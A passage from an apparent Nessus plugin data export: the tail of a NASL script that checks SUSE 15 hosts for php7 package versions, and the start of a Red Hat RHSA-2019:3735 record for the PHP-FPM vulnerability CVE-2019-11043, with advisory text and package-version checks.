reference:\"php7-sysvsem-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-sysvshm-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-sysvshm-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-tidy-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-tidy-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-tokenizer-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-tokenizer-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-wddx-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-wddx-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-xmlreader-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-xmlreader-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-xmlrpc-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-xmlrpc-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-xmlwriter-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-xmlwriter-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-xsl-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-xsl-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-zip-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-zip-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-zlib-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"php7-zlib-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-mod_php7-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"apache2-mod_php7-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-bcmath-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-bcmath-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-bz2-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-bz2-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-calendar-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-calendar-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-ctype-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-ctype-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-curl-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-curl-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-dba-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-dba-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-debugsource-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-devel-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-dom-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-dom-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-embed-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-embed-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-enchant-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-enchant-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-exif-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-exif-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-fastcgi-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-fastcgi-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-fileinfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-fileinfo-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-fpm-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-fpm-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-ftp-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-ftp-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-gd-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-gd-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-gettext-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-gettext-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-gmp-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-gmp-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-iconv-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-iconv-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-intl-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-intl-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-json-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-json-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-ldap-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-ldap-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-mbstring-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-mbstring-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-mysql-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-mysql-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-odbc-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-odbc-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-opcache-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-opcache-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-openssl-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-openssl-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-pcntl-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-pcntl-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-pdo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-pdo-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-pgsql-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-pgsql-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-phar-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-phar-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-posix-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-posix-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-readline-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-readline-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-shmop-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-shmop-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-snmp-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-snmp-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-soap-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-soap-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-sockets-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-sockets-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-sodium-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-sodium-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-sqlite-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-sqlite-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-sysvmsg-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-sysvmsg-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-sysvsem-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-sysvsem-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-sysvshm-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-sysvshm-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-tidy-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-tidy-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-tokenizer-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-tokenizer-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-wddx-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-wddx-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-xmlreader-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-xmlreader-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-xmlrpc-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-xmlrpc-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-xmlwriter-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-xmlwriter-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-xsl-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-xsl-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-zip-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-zip-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-zlib-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"php7-zlib-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"php7-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"php7-debugsource-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"php7-embed-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"php7-embed-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"php7-readline-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"php7-readline-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"php7-sodium-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"php7-sodium-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"php7-tidy-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"php7-tidy-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"php7-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"php7-debugsource-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"php7-embed-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"php7-embed-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"php7-readline-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"php7-readline-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"php7-sodium-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"php7-sodium-debuginfo-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"php7-tidy-7.2.5-4.46.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"php7-tidy-debuginfo-7.2.5-4.46.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php7\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:31:16", "description": "An update for the php:7.2 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nSecurity Fix(es) :\n\n* php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {}, "published": "2019-11-08T00:00:00", "type": "nessus", "title": "RHEL 8 : php:7.2 (RHSA-2019:3735)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11043"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apcu-panel", "p-cpe:/a:redhat:enterprise_linux:libzip", "p-cpe:/a:redhat:enterprise_linux:libzip-debugsource", "p-cpe:/a:redhat:enterprise_linux:libzip-devel", "p-cpe:/a:redhat:enterprise_linux:libzip-tools", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-bcmath", "p-cpe:/a:redhat:enterprise_linux:php-cli", "p-cpe:/a:redhat:enterprise_linux:php-common", "p-cpe:/a:redhat:enterprise_linux:php-dba", "p-cpe:/a:redhat:enterprise_linux:php-dbg", "p-cpe:/a:redhat:enterprise_linux:php-debugsource", "p-cpe:/a:redhat:enterprise_linux:php-devel", "p-cpe:/a:redhat:enterprise_linux:php-embedded", "p-cpe:/a:redhat:enterprise_linux:php-enchant", "p-cpe:/a:redhat:enterprise_linux:php-fpm", "p-cpe:/a:redhat:enterprise_linux:php-gd", "p-cpe:/a:redhat:enterprise_linux:php-gmp", "p-cpe:/a:redhat:enterprise_linux:php-intl", "p-cpe:/a:redhat:enterprise_linux:php-json", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-mbstring", "p-cpe:/a:redhat:enterprise_linux:php-mysqlnd", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-opcache", "p-cpe:/a:redhat:enterprise_linux:php-pdo", "p-cpe:/a:redhat:enterprise_linux:php-pear", "p-cpe:/a:redhat:enterprise_linux:php-pecl-apcu", "p-cpe:/a:redhat:enterprise_linux:php-pecl-apcu-debugsource", "p-cpe:/a:redhat:enterprise_linux:php-pecl-apcu-devel", "p-cpe:/a:redhat:enterprise_linux:php-pecl-zip", "p-cpe:/a:redhat:enterprise_linux:php-pecl-zip-debugsource", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "p-cpe:/a:redhat:enterprise_linux:php-process", "p-cpe:/a:redhat:enterprise_linux:php-recode", "p-cpe:/a:redhat:enterprise_linux:php-snmp", "p-cpe:/a:redhat:enterprise_linux:php-soap", "p-cpe:/a:redhat:enterprise_linux:php-xml", "p-cpe:/a:redhat:enterprise_linux:php-xmlrpc", "cpe:/o:redhat:enterprise_linux:8", "cpe:/o:redhat:enterprise_linux:8.1"], "id": "REDHAT-RHSA-2019-3735.NASL", "href": "https://www.tenable.com/plugins/nessus/130738", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:3735. The text\n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130738);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11043\");\n script_xref(name:\"RHSA\", value:\"2019:3735\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"RHEL 8 : php:7.2 (RHSA-2019:3735)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for the php:7.2 module is now available for Red Hat\nEnterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nSecurity Fix(es) :\n\n* php: underflow in env_path_info in fpm_main.c (CVE-2019-11043)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3735\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-11043\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP-FPM Underflow RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apcu-panel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libzip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libzip-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libzip-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libzip-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pecl-apcu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pecl-apcu-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pecl-apcu-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pecl-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pecl-zip-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 